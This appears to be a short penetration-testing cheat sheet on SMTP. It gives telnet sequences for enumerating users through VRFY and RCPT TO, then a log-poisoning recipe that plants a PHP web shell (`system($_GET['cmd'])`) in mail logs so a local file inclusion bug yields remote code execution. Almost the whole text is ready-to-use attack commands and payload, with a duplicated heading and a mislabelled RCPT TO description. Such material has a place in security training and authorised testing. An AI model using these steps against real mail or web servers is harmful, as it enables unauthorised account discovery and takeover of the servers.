SMTP
Simple Mail Transfer Protocol (SMTP) - Port 25
SMTP
Simple Mail Transfer Protocol (SMTP) - Port 25
User Enumeration
VRFY
Check for existing users on a system using the VRFY command in SMTP.
telnet IP PORT
VRFY root
VRFY user
RCPT TO
Check for existing users on a system using the VRFY command in SMTP.
telnet IP PORT
MAIL FROM: root
RCPT TO: root
RCPT TO: user
SMTP Log Poisoning through LFI to RCE
If SMTP is available and a LFI vulnerability is discovered in a web application, injecting a PHP shell into the mail logs via SMTP can lead to RCE through the LFI.
<?php echo system($_GET["cmd"]); ?>
Connect to SMTP and send a message with PHP injected.
telnet IP PORT
HELO x
MAIL FROM: [email protected]
RCPT TO: root
DATA
SUBJECT: <?php echo system($_GET["cmd"]); ?>
.
Browse to the LFI (typically /var/log/mail) to check for code execution.